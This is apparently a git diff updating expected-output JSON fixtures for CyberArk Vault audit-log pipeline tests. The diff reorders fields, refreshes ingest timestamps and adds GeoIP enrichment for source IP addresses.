--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", 
@@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -46,14 +39,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "remove owner", - "ingested": "2021-12-09T13:36:43.869926900Z", + "ingested": "2021-12-14T14:42:08.795442349Z", "original": "\u003c5\u003e1 2021-03-10T17:59:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:33\",\"IsoTimestamp\":\"2021-03-10T17:59:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"273\",\"Desc\":\"Remove Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Owner\",\"GatewayStation\":\"\"}}}", "code": "273", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json index f942646255c..ae4dfdb0b56 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json 
@@ -55,7 +55,7 @@ "event": { "severity": 2, "action": "add rule", - "ingested": "2021-12-09T13:36:43.972786Z", + "ingested": "2021-12-14T14:42:08.933990028Z", "original": "\u003c5\u003e1 2021-03-11T18:01:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:01:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:01:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e278\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Rule\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Rule\u003c/Action\u003e\\n \u003cSourceUser\u003eAdministrator\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMUnmanagedSessionAccounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\2\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eAllow\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Rule\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:01:14\",\"IsoTimestamp\":\"2021-03-11T18:01:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"278\",\"Desc\":\"Add Rule\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Add 
Rule\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMUnmanagedSessionAccounts\",\"File\":\"Root\\\\2\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Allow\",\"ExtraDetails\":\"\",\"Message\":\"Add Rule\",\"GatewayStation\":\"\"}}}", "code": "278", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json index 73b2242f20c..1eaf8b49c2a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "auto clear users history start", - "ingested": "2021-12-09T13:36:44.088513500Z", + "ingested": "2021-12-14T14:42:09.071013489Z", "original": "\u003c5\u003e1 2021-03-05T11:00:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 03:00:06\",\"IsoTimestamp\":\"2021-03-05T11:00:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"288\",\"Desc\":\"Auto Clear Users History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History start\",\"GatewayStation\":\"\"}}}", "code": "288", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "auto clear users history start", - "ingested": "2021-12-09T13:36:44.088521700Z", + "ingested": "2021-12-14T14:42:09.071016886Z", "original": "Mar 08 03:00:20 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"288\",\"Desc\":\"Auto Clear Users History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History start\",\"GatewayStation\":\"\"}}}", "code": "288", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json index b9c3b31e63d..3bca99c9ef1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "auto clear users history end", - "ingested": "2021-12-09T13:36:44.255396Z", + "ingested": "2021-12-14T14:42:09.282782025Z", "original": "\u003c5\u003e1 2021-03-05T11:00:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 03:00:06\",\"IsoTimestamp\":\"2021-03-05T11:00:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"289\",\"Desc\":\"Auto Clear Users History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History end\",\"GatewayStation\":\"\"}}}", "code": "289", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "auto clear users history end", - "ingested": "2021-12-09T13:36:44.255404400Z", + "ingested": "2021-12-14T14:42:09.282784853Z", "original": "Mar 08 03:00:20 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"289\",\"Desc\":\"Auto Clear Users History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History end\",\"GatewayStation\":\"\"}}}", "code": "289", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json index 2dba10224d3..39729a17c4a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "auto clear safes history start", - "ingested": "2021-12-09T13:36:44.417420500Z", + "ingested": "2021-12-14T14:42:09.486532095Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"290\",\"Desc\":\"Auto Clear Safes History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Safes History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Safes History start\",\"GatewayStation\":\"\"}}}", "code": "290", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json index db7bc649ddb..21f516ef1fd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", 
@@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "auto clear safes history end", - "ingested": "2021-12-09T13:36:44.514883300Z", + "ingested": "2021-12-14T14:42:09.597428026Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"291\",\"Desc\":\"Auto Clear Safes History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Safes History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Safes History end\",\"GatewayStation\":\"\"}}}", "code": "291", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json index eb5b8ea3f8b..234232ff74a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json 
@@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612758400Z", + "ingested": "2021-12-14T14:42:09.706883772Z", "original": "\u003c5\u003e1 2021-03-08T10:19:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 02:19:42\",\"IsoTimestamp\":\"2021-03-08T10:19:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615198782\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "294", "kind": "event" 
@@ -129,7 +129,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612767300Z", + "ingested": "2021-12-14T14:42:09.706886157Z", "original": "\u003c5\u003e1 2021-03-08T18:24:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:49\",\"IsoTimestamp\":\"2021-03-08T18:24:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "294", "kind": "event" 
@@ -208,7 +208,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612772900Z", + "ingested": "2021-12-14T14:42:09.706886645Z", "original": "\u003c5\u003e1 2021-03-08T19:20:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:02\",\"IsoTimestamp\":\"2021-03-08T19:20:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"26\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615231182\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614785704\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" 
@@ -276,7 +276,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612778200Z", + "ingested": "2021-12-14T14:42:09.706887131Z", "original": "\u003c5\u003e1 2021-03-10T14:38:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:38:57\",\"IsoTimestamp\":\"2021-03-10T14:38:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615387136\"},{\"Name\":\"CurrInd\",\"Value\":\"1\"}]}}}}", "code": "294", "kind": "event" @@ -289,6 +289,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -334,7 +343,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612783600Z", + "ingested": "2021-12-14T14:42:09.706887528Z", "original": "\u003c5\u003e1 2021-03-10T17:58:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:06\",\"IsoTimestamp\":\"2021-03-10T17:58:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}", "code": "294", "kind": "event" @@ -347,6 +356,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -392,7 +410,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612789Z", + "ingested": "2021-12-14T14:42:09.706887944Z", "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}", "code": "294", "kind": "event" 
@@ -471,7 +489,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612794500Z", + "ingested": "2021-12-14T14:42:09.706888376Z", "original": "\u003c5\u003e1 2021-03-10T23:39:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:25\",\"IsoTimestamp\":\"2021-03-10T23:39:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615419536\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" 
@@ -540,7 +558,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612799800Z", + "ingested": "2021-12-14T14:42:09.706888771Z", "original": "\u003c5\u003e1 2021-03-14T11:48:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 04:48:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T11:48:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Groups\\\\WindowsGroup\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 